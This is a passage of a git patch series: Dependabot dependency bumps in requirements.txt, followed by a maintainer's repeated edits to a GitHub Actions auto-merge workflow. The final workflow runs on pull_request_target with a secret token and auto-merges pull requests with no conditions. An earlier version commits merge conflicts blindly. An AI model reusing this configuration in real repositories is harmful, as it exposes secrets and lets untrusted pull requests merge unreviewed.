Fri, 29 Mar 2024 09:00:37 +0000 Subject: [PATCH 024/106] Bump lxml from 5.1.0 to 5.1.1 Bumps [lxml](https://github.com/lxml/lxml) from 5.1.0 to 5.1.1. - [Release notes](https://github.com/lxml/lxml/releases) - [Changelog](https://github.com/lxml/lxml/blob/master/CHANGES.txt) - [Commits](https://github.com/lxml/lxml/compare/lxml-5.1.0...lxml-5.1.1) --- updated-dependencies: - dependency-name: lxml dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 0da90d0..3ab07f3 100644 --- a/requirements.txt +++ b/requirements.txt @@ -5,7 +5,7 @@ cryptography==42.0.5 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 -lxml==5.1.0 +lxml==5.1.1 pyasn1==0.6.0 pyOpenSSL==24.1.0 pycparser==2.21 From df0fa6f4540f95223638d6681bfaa2c4af1dd0c3 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 1 Apr 2024 09:03:49 +0000 Subject: [PATCH 025/106] Bump pycparser from 2.21 to 2.22 Bumps [pycparser](https://github.com/eliben/pycparser) from 2.21 to 2.22. - [Release notes](https://github.com/eliben/pycparser/releases) - [Changelog](https://github.com/eliben/pycparser/blob/main/CHANGES) - [Commits](https://github.com/eliben/pycparser/compare/release_v2.21...release_v2.22) --- updated-dependencies: - dependency-name: pycparser dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 3ab07f3..0f72e28 100644 --- a/requirements.txt +++ b/requirements.txt @@ -8,6 +8,6 @@ future==1.0.0 lxml==5.1.1 pyasn1==0.6.0 pyOpenSSL==24.1.0 -pycparser==2.21 +pycparser==2.22 signxml==3.2.2 six==1.16.0 From 44e0cb0b304c647d5734b3187ef58ef99eb423d6 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 1 Apr 2024 09:03:56 +0000 Subject: [PATCH 026/106] Bump lxml from 5.1.1 to 5.2.0 Bumps [lxml](https://github.com/lxml/lxml) from 5.1.1 to 5.2.0. - [Release notes](https://github.com/lxml/lxml/releases) - [Changelog](https://github.com/lxml/lxml/blob/master/CHANGES.txt) - [Commits](https://github.com/lxml/lxml/compare/lxml-5.1.1...lxml-5.2.0) --- updated-dependencies: - dependency-name: lxml dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 3ab07f3..c0a519b 100644 --- a/requirements.txt +++ b/requirements.txt @@ -5,7 +5,7 @@ cryptography==42.0.5 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 -lxml==5.1.1 +lxml==5.2.0 pyasn1==0.6.0 pyOpenSSL==24.1.0 pycparser==2.21 From 6f2f2d2cf332b42037da002bd940030c9bb53b7f Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 3 Apr 2024 08:56:51 +0000 Subject: [PATCH 027/106] Bump lxml from 5.2.0 to 5.2.1 Bumps [lxml](https://github.com/lxml/lxml) from 5.2.0 to 5.2.1. - [Release notes](https://github.com/lxml/lxml/releases) - [Changelog](https://github.com/lxml/lxml/blob/master/CHANGES.txt) - [Commits](https://github.com/lxml/lxml/compare/lxml-5.2.0...lxml-5.2.1) --- updated-dependencies: - dependency-name: lxml dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index a8bff5f..ecf6eb2 100644 --- a/requirements.txt +++ b/requirements.txt @@ -5,7 +5,7 @@ cryptography==42.0.5 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 -lxml==5.2.0 +lxml==5.2.1 pyasn1==0.6.0 pyOpenSSL==24.1.0 pycparser==2.22 From 1dffdc789263cd080f4421f4148090945cd5d75b Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 7 May 2024 08:47:51 +0000 Subject: [PATCH 028/106] Bump cryptography from 42.0.5 to 42.0.7 Bumps [cryptography](https://github.com/pyca/cryptography) from 42.0.5 to 42.0.7. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/42.0.5...42.0.7) --- updated-dependencies: - dependency-name: cryptography dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index ecf6eb2..f31a0f8 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2024.2.2 cffi==1.16.0 -cryptography==42.0.5 +cryptography==42.0.7 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From d6c57162f7255f497ccf643a464f5935698651ec Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 13 May 2024 08:29:17 +0000 Subject: [PATCH 029/106] Bump lxml from 5.2.1 to 5.2.2 Bumps [lxml](https://github.com/lxml/lxml) from 5.2.1 to 5.2.2. - [Release notes](https://github.com/lxml/lxml/releases) - [Changelog](https://github.com/lxml/lxml/blob/master/CHANGES.txt) - [Commits](https://github.com/lxml/lxml/compare/lxml-5.2.1...lxml-5.2.2) --- updated-dependencies: - dependency-name: lxml dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index ecf6eb2..954262a 100644 --- a/requirements.txt +++ b/requirements.txt @@ -5,7 +5,7 @@ cryptography==42.0.5 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 -lxml==5.2.1 +lxml==5.2.2 pyasn1==0.6.0 pyOpenSSL==24.1.0 pycparser==2.22 From 2238b42968e7ee464e4caf6676d18803b852b544 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 3 Jun 2024 09:03:51 +0000 Subject: [PATCH 030/106] Bump certifi from 2024.2.2 to 2024.6.2 Bumps [certifi](https://github.com/certifi/python-certifi) from 2024.2.2 to 2024.6.2. - [Commits](https://github.com/certifi/python-certifi/compare/2024.02.02...2024.06.02) --- updated-dependencies: - dependency-name: certifi dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 4ce337c..6c7b62b 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ asn1crypto==1.5.1 -certifi==2024.2.2 +certifi==2024.6.2 cffi==1.16.0 cryptography==42.0.7 defusedxml==0.7.1 From f079f8d0523880bcc3337f8572637a9f6351ce4d Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 5 Jun 2024 08:45:04 +0000 Subject: [PATCH 031/106] Bump cryptography from 42.0.7 to 42.0.8 Bumps [cryptography](https://github.com/pyca/cryptography) from 42.0.7 to 42.0.8. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/42.0.7...42.0.8) --- updated-dependencies: - dependency-name: cryptography dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 4ce337c..16315e8 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2024.2.2 cffi==1.16.0 -cryptography==42.0.7 +cryptography==42.0.8 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From de5cb98b702eaec7eebdba09d2e69f9e3de3ef00 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 4 Jul 2024 08:25:28 +0000 Subject: [PATCH 032/106] Bump certifi from 2024.6.2 to 2024.7.4 Bumps [certifi](https://github.com/certifi/python-certifi) from 2024.6.2 to 2024.7.4. - [Commits](https://github.com/certifi/python-certifi/compare/2024.06.02...2024.07.04) --- updated-dependencies: - dependency-name: certifi dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index f235935..42d5eb3 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ asn1crypto==1.5.1 -certifi==2024.6.2 +certifi==2024.7.4 cffi==1.16.0 cryptography==42.0.8 defusedxml==0.7.1 From aaab36533a157e34144e1ccafce72d4dfddb1d7e Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 22 Jul 2024 09:00:11 +0000 Subject: [PATCH 033/106] Bump pyopenssl from 24.1.0 to 24.2.1 Bumps [pyopenssl](https://github.com/pyca/pyopenssl) from 24.1.0 to 24.2.1. - [Changelog](https://github.com/pyca/pyopenssl/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/pyopenssl/compare/24.1.0...24.2.1) --- updated-dependencies: - dependency-name: pyopenssl dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 42d5eb3..c8a0137 100644 --- a/requirements.txt +++ b/requirements.txt @@ -7,7 +7,7 @@ eight==1.0.1 future==1.0.0 lxml==5.2.2 pyasn1==0.6.0 -pyOpenSSL==24.1.0 +pyOpenSSL==24.2.1 pycparser==2.22 signxml==3.2.2 six==1.16.0 From 87c392a2c6a82fc2991ab0ae3bbf5ec90124c87e Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 22 Jul 2024 09:00:17 +0000 Subject: [PATCH 034/106] Bump cryptography from 42.0.8 to 43.0.0 Bumps [cryptography](https://github.com/pyca/cryptography) from 42.0.8 to 43.0.0. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/42.0.8...43.0.0) --- updated-dependencies: - dependency-name: cryptography dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 42d5eb3..6c98a45 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,7 +1,7 @@ asn1crypto==1.5.1 certifi==2024.7.4 cffi==1.16.0 -cryptography==42.0.8 +cryptography==43.0.0 defusedxml==0.7.1 eight==1.0.1 future==1.0.0 From 4225e9d0e2ecd93823a491ee77142b00dce666bc Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 7 Aug 2024 08:56:00 +0000 Subject: [PATCH 035/106] Bump cffi from 1.16.0 to 1.17.0 Bumps [cffi](https://github.com/python-cffi/cffi) from 1.16.0 to 1.17.0. - [Release notes](https://github.com/python-cffi/cffi/releases) - [Commits](https://github.com/python-cffi/cffi/compare/v1.16.0...v1.17.0) --- updated-dependencies: - dependency-name: cffi dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index a628e65..7176312 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,6 +1,6 @@ asn1crypto==1.5.1 certifi==2024.7.4 -cffi==1.16.0 +cffi==1.17.0 cryptography==43.0.0 defusedxml==0.7.1 eight==1.0.1 From e4de5a8fe3687491948b3ed203cafa93e358fecc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D2=89=CE=B1k=CE=B1=20x=E2=A0=A0=E2=A0=B5?= <32862241+4k4xs4pH1r3@users.noreply.github.com> Date: Thu, 8 Aug 2024 19:11:26 -0500 Subject: [PATCH 036/106] Create auto_merge.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: ҉αkα x⠠⠵ <32862241+4k4xs4pH1r3@users.noreply.github.com> --- .github/workflows/auto_merge.yml | 33 ++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 .github/workflows/auto_merge.yml diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml new file mode 100644 index 0000000..6c79f80 --- /dev/null +++ b/.github/workflows/auto_merge.yml @@ -0,0 +1,33 @@ +name: Auto Update and Merge + +on: + push: + branches: + - master # Trigger on pushes to the master branch + +jobs: + auto-update-and-merge: + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v3 + with: + fetch-depth: 0 # Fetch all history for merging + + - name: Merge main into target branch + run: | + git config --global user.name 'github-actions[bot]' + git config --global user.email 'github-actions[bot]@users.noreply.github.com' + git checkout master # Replace 'target-branch' with your actual branch name + git merge master --no-ff # Merge with a merge commit + + - name: Push changes + run: git push + + - name: Auto-merge pull requests + uses: ridedott/merge-me-action@v2 + with: + GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} + MERGE_METHOD: MERGE # Use 'MERGE' for a merge commit + PRESET: NONE + # Other options can be added here if needed, but be cautious From 7c53f3dbb82b9831c4fb616cecbb8504f5259405 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D2=89=CE=B1k=CE=B1=20x=E2=A0=A0=E2=A0=B5?= <32862241+4k4xs4pH1r3@users.noreply.github.com> Date: Thu, 8 Aug 2024 19:15:18 -0500 Subject: [PATCH 037/106] Update auto_merge.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: ҉αkα x⠠⠵ <32862241+4k4xs4pH1r3@users.noreply.github.com> --- .github/workflows/auto_merge.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml index 6c79f80..65180bb 100644 --- a/.github/workflows/auto_merge.yml +++ b/.github/workflows/auto_merge.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Checkout code - uses: actions/checkout@v3 + uses: actions/checkout@v4.1.7 with: fetch-depth: 0 # Fetch all history for merging @@ -25,9 +25,9 @@ jobs: run: git push - name: Auto-merge pull requests - uses: ridedott/merge-me-action@v2 + uses: ridedott/merge-me-action@v2.10.93 with: - GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} + github-token: ${{ secrets.GH_TOKEN }} MERGE_METHOD: MERGE # Use 'MERGE' for a merge commit PRESET: NONE # Other options can be added here if needed, but be cautious From b7c4f041cbae0d4bc21a9f015b5ae9840a9b7083 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D2=89=CE=B1k=CE=B1=20x=E2=A0=A0=E2=A0=B5?= <32862241+4k4xs4pH1r3@users.noreply.github.com> Date: Thu, 8 Aug 2024 19:16:04 -0500 Subject: [PATCH 038/106] Update auto_merge.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: ҉αkα x⠠⠵ <32862241+4k4xs4pH1r3@users.noreply.github.com> --- .github/workflows/auto_merge.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml index 65180bb..0343986 100644 --- a/.github/workflows/auto_merge.yml +++ b/.github/workflows/auto_merge.yml @@ -27,7 +27,7 @@ jobs: - name: Auto-merge pull requests uses: ridedott/merge-me-action@v2.10.93 with: - github-token: ${{ secrets.GH_TOKEN }} + GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} MERGE_METHOD: MERGE # Use 'MERGE' for a merge commit PRESET: NONE # Other options can be added here if needed, but be cautious From 1a89b531328611a71f6c535798bcb67a90055636 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D2=89=CE=B1k=CE=B1=20x=E2=A0=A0=E2=A0=B5?= <32862241+4k4xs4pH1r3@users.noreply.github.com> Date: Thu, 8 Aug 2024 19:18:26 -0500 Subject: [PATCH 039/106] Update auto_merge.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: ҉αkα x⠠⠵ <32862241+4k4xs4pH1r3@users.noreply.github.com> --- .github/workflows/auto_merge.yml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml index 0343986..d201dfe 100644 --- a/.github/workflows/auto_merge.yml +++ b/.github/workflows/auto_merge.yml @@ -3,7 +3,11 @@ name: Auto Update and Merge on: push: branches: - - master # Trigger on pushes to the master branch + - master # Trigger on pushes to the master branch + + pull_request: # Trigger on pull requests + branches: + - master # Replace 'target-branch' with your actual branch name jobs: auto-update-and-merge: From 50cdfa4bbbb9f461d41492ea4f3134e784ffe4ea Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D2=89=CE=B1k=CE=B1=20x=E2=A0=A0=E2=A0=B5?= <32862241+4k4xs4pH1r3@users.noreply.github.com> Date: Thu, 8 Aug 2024 19:22:30 -0500 Subject: [PATCH 040/106] Update auto_merge.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: ҉αkα x⠠⠵ <32862241+4k4xs4pH1r3@users.noreply.github.com> --- .github/workflows/auto_merge.yml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml index d201dfe..3257c2b 100644 --- a/.github/workflows/auto_merge.yml +++ b/.github/workflows/auto_merge.yml @@ -1,11 +1,8 @@ name: Auto Update and Merge on: - push: - branches: - - master # Trigger on pushes to the master branch - - pull_request: # Trigger on pull requests + pull_request_target: + types: [assigned, unassigned, labeled, unlabeled, opened, edited, reopened, synchronize, ready_for_review, locked, unlocked, review_requested, review_request_removed, auto_merge_enabled, auto_merge_disabled] branches: - master # Replace 'target-branch' with your actual branch name From 1b2184c95a89c4d8b769760f6a2a7f49a2361c86 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D2=89=CE=B1k=CE=B1=20x=E2=A0=A0=E2=A0=B5?= <32862241+4k4xs4pH1r3@users.noreply.github.com> Date: Thu, 8 Aug 2024 19:26:06 -0500 Subject: [PATCH 041/106] Update auto_merge.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: ҉αkα x⠠⠵ <32862241+4k4xs4pH1r3@users.noreply.github.com> --- .github/workflows/auto_merge.yml | 30 ++++++++++++++++++++++-------- 1 file changed, 22 insertions(+), 8 deletions(-) diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml index 3257c2b..446a9c5 100644 --- a/.github/workflows/auto_merge.yml +++ b/.github/workflows/auto_merge.yml @@ -6,6 +6,7 @@ on: branches: - master # Replace 'target-branch' with your actual branch name + jobs: auto-update-and-merge: runs-on: ubuntu-latest @@ -13,22 +14,35 @@ jobs: - name: Checkout code uses: actions/checkout@v4.1.7 with: - fetch-depth: 0 # Fetch all history for merging + fetch-depth: 0 - - name: Merge main into target branch + - name: Merge main into master run: | git config --global user.name 'github-actions[bot]' git config --global user.email 'github-actions[bot]@users.noreply.github.com' - git checkout master # Replace 'target-branch' with your actual branch name - git merge master --no-ff # Merge with a merge commit + git checkout master + git merge main --no-ff + + - name: Handle potential non-fast-forward error + run: | + # Fetch latest changes from the remote + git fetch origin master + + # Attempt to merge, handling conflicts if they occur + if ! git merge origin/master; then + echo "Conflicts detected. Resolving..." + # You might want to add more specific conflict resolution logic here + git add . # Stage all changes (careful!) + git commit -m "Resolve merge conflicts" + fi - name: Push changes run: git push - - name: Auto-merge pull requests + - name: Auto-merge pull requests (with caution!) uses: ridedott/merge-me-action@v2.10.93 with: GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} - MERGE_METHOD: MERGE # Use 'MERGE' for a merge commit - PRESET: NONE - # Other options can be added here if needed, but be cautious + MERGE_METHOD: MERGE + PRESET: NONE + # Add conditions or checks here to control which PRs are auto-merged From b95f9cc18b93be6014729f3c7d10f93e2105f904 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D2=89=CE=B1k=CE=B1=20x=E2=A0=A0=E2=A0=B5?= <32862241+4k4xs4pH1r3@users.noreply.github.com> Date: Thu, 8 Aug 2024 19:28:57 -0500 Subject: [PATCH 042/106] Update auto_merge.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: ҉αkα x⠠⠵ <32862241+4k4xs4pH1r3@users.noreply.github.com> --- .github/workflows/auto_merge.yml | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml index 446a9c5..7c36e92 100644 --- a/.github/workflows/auto_merge.yml +++ b/.github/workflows/auto_merge.yml @@ -6,7 +6,6 @@ on: branches: - master # Replace 'target-branch' with your actual branch name - jobs: auto-update-and-merge: runs-on: ubuntu-latest @@ -25,15 +24,13 @@ jobs: - name: Handle potential non-fast-forward error run: | - # Fetch latest changes from the remote - git fetch origin master + # Pull latest changes from the remote with rebase + git pull --rebase origin master - # Attempt to merge, handling conflicts if they occur - if ! git merge origin/master; then - echo "Conflicts detected. Resolving..." - # You might want to add more specific conflict resolution logic here - git add . # Stage all changes (careful!) - git commit -m "Resolve merge conflicts" + # Handle conflicts if they occur (consider adding more specific logic) + if [ $? -ne 0 ]; then + echo "Conflicts detected during rebase. Please resolve manually and continue the rebase." + exit 1 # Fail the workflow if conflicts cannot be resolved automatically fi - name: Push changes From aa94cc3cc00e4c9593814f8802be9d79f19f7b02 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D2=89=CE=B1k=CE=B1=20x=E2=A0=A0=E2=A0=B5?= <32862241+4k4xs4pH1r3@users.noreply.github.com> Date: Thu, 8 Aug 2024 19:31:24 -0500 Subject: [PATCH 043/106] Update auto_merge.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: ҉αkα x⠠⠵ <32862241+4k4xs4pH1r3@users.noreply.github.com> --- .github/workflows/auto_merge.yml | 24 ++++++++++++++++++------ 1 file changed, 18 insertions(+), 6 deletions(-) diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml index 7c36e92..d44ccab 100644 --- a/.github/workflows/auto_merge.yml +++ b/.github/workflows/auto_merge.yml @@ -6,6 +6,7 @@ on: branches: - master # Replace 'target-branch' with your actual branch name + jobs: auto-update-and-merge: runs-on: ubuntu-latest @@ -22,15 +23,26 @@ jobs: git checkout master git merge main --no-ff - - name: Handle potential non-fast-forward error + - name: Handle potential non-fast-forward error (with retries) run: | - # Pull latest changes from the remote with rebase - git pull --rebase origin master + for i in {1..3}; do # Retry up to 3 times + # Pull latest changes from the remote with rebase + git pull --rebase origin master + + # Check for conflicts + if [ $? -eq 0 ]; then + echo "Rebase successful. Proceeding with push..." + break # Exit the loop if rebase is successful + else + echo "Conflicts detected during rebase. Retrying in 5 seconds... (Attempt $i)" + sleep 5 + fi + done - # Handle conflicts if they occur (consider adding more specific logic) + # Check if all retries failed if [ $? -ne 0 ]; then - echo "Conflicts detected during rebase. Please resolve manually and continue the rebase." - exit 1 # Fail the workflow if conflicts cannot be resolved automatically + echo "All rebase attempts failed. Please resolve conflicts manually and push again." + exit 1 fi - name: Push changes From cdadbc879816000b04973b8bf50666ae151890a9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D2=89=CE=B1k=CE=B1=20x=E2=A0=A0=E2=A0=B5?= <32862241+4k4xs4pH1r3@users.noreply.github.com> Date: Thu, 8 Aug 2024 19:36:05 -0500 Subject: [PATCH 044/106] Update auto_merge.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: ҉αkα x⠠⠵ <32862241+4k4xs4pH1r3@users.noreply.github.com> --- .github/workflows/auto_merge.yml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml index d44ccab..95cd5d5 100644 --- a/.github/workflows/auto_merge.yml +++ b/.github/workflows/auto_merge.yml @@ -23,6 +23,9 @@ jobs: git checkout master git merge main --no-ff + - name: Pull latest changes + run: git pull origin master + - name: Handle potential non-fast-forward error (with retries) run: | for i in {1..3}; do # Retry up to 3 times @@ -45,8 +48,6 @@ jobs: exit 1 fi - - name: Push changes - run: git push - name: Auto-merge pull requests (with caution!) uses: ridedott/merge-me-action@v2.10.93 @@ -55,3 +56,7 @@ jobs: MERGE_METHOD: MERGE PRESET: NONE # Add conditions or checks here to control which PRs are auto-merged + + + - name: Push changes + run: git push From 0d17be149a2f0bae03745c9bd1c37ef08c58330a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D2=89=CE=B1k=CE=B1=20x=E2=A0=A0=E2=A0=B5?= <32862241+4k4xs4pH1r3@users.noreply.github.com> Date: Thu, 8 Aug 2024 19:37:14 -0500 Subject: [PATCH 045/106] Update auto_merge.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: ҉αkα x⠠⠵ <32862241+4k4xs4pH1r3@users.noreply.github.com> --- .github/workflows/auto_merge.yml | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml index 95cd5d5..5bc6e5a 100644 --- a/.github/workflows/auto_merge.yml +++ b/.github/workflows/auto_merge.yml @@ -55,8 +55,4 @@ jobs: GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} MERGE_METHOD: MERGE PRESET: NONE - # Add conditions or checks here to control which PRs are auto-merged - - - - name: Push changes - run: git push + # Add conditions or checks here to control which PRs are auto-merged From 43338841a72629902f1ee93c9f46eb329652a356 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D2=89=CE=B1k=CE=B1=20x=E2=A0=A0=E2=A0=B5?= <32862241+4k4xs4pH1r3@users.noreply.github.com> Date: Thu, 8 Aug 2024 19:38:52 -0500 Subject: [PATCH 046/106] Update auto_merge.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: ҉αkα x⠠⠵ <32862241+4k4xs4pH1r3@users.noreply.github.com> --- .github/workflows/auto_merge.yml | 32 -------------------------------- 1 file changed, 32 deletions(-) diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml index 5bc6e5a..4db30ef 100644 --- a/.github/workflows/auto_merge.yml +++ b/.github/workflows/auto_merge.yml @@ -16,38 +16,6 @@ jobs: with: fetch-depth: 0 - - name: Merge main into master - run: | - git config --global user.name 'github-actions[bot]' - git config --global user.email 'github-actions[bot]@users.noreply.github.com' - git checkout master - git merge main --no-ff - - - name: Pull latest changes - run: git pull origin master - - - name: Handle potential non-fast-forward error (with retries) - run: | - for i in {1..3}; do # Retry up to 3 times - # Pull latest changes from the remote with rebase - git pull --rebase origin master - - # Check for conflicts - if [ $? -eq 0 ]; then - echo "Rebase successful. Proceeding with push..." - break # Exit the loop if rebase is successful - else - echo "Conflicts detected during rebase. Retrying in 5 seconds... (Attempt $i)" - sleep 5 - fi - done - - # Check if all retries failed - if [ $? -ne 0 ]; then - echo "All rebase attempts failed. Please resolve conflicts manually and push again." - exit 1 - fi - - name: Auto-merge pull requests (with caution!) uses: ridedott/merge-me-action@v2.10.93 From 3f7fb7d6475c7e5b04783cfba35bb599161450a0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D2=89=CE=B1k=CE=B1=20x=E2=A0=A0=E2=A0=B5?= <32862241+4k4xs4pH1r3@users.noreply.github.com> Date: Thu, 8 Aug 2024 19:45:56 -0500 Subject: [PATCH 047/106] Update auto_merge.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: ҉αkα x⠠⠵ <32862241+4k4xs4pH1r3@users.noreply.github.com> --- .github/workflows/auto_merge.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml index 4db30ef..3fea27e 100644 --- a/.github/workflows/auto_merge.yml +++ b/.github/workflows/auto_merge.yml @@ -22,5 +22,4 @@ jobs: with: GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} MERGE_METHOD: MERGE - PRESET: NONE # Add conditions or checks here to control which PRs are auto-merged From 8b8b1783b8ef7737127f531fd1aec45ea10dc745 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=D2=89=CE=B1k=CE=B1=20x=E2=A0=A0=E2=A0=B5?= <32862241+4k4xs4pH1r3@users.noreply.github.com> Date: Thu, 8 